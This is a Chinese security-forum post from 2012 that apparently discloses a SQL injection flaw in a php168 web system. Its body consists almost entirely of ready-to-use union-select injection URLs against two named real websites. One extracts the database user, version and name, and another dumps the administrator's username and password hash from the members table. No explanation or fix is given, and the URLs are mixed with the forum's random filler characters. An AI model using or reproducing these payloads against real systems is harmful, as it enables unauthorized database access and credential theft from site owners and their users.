找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2842|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--# i6 f" @6 F3 V* |" f7 v& }
                                                         
9 \1 l2 ?' B. H: F                                       - q! p9 h6 X7 y+ K; B* S* S
& K* C. x4 O- z) Q; ?
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
; n; T8 d# a/ E! Z5 U% X                                                     / S$ `- z/ ~* O  F1 l2 \& W
                                                                   $ G+ W$ U1 U# v! f# |2 g
                                                        
. Z$ b: B! @" K  s2 L' a1 bhttp://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--2 Q9 @: D( L( a: s
& Y7 f1 t+ @2 g: @& r

% D' M7 o9 C- d1 a3 i7 g2 s0 j% ^
7 ~; v. g% E: r+ O- f% ~7 a! K                                                            ! Q: J5 s8 E- c9 T. B- \, S

1 ]* o& M  a. F: Bhttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--) D7 Q0 @9 I, Z: X5 t5 M
1 y  }. O- w/ s4 C

0 d- K  S5 }  b/ A% J: x! X0 d
! m& K4 _* ]+ ^( k                                                                    
- A: \! F( Y: @8 _% w

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表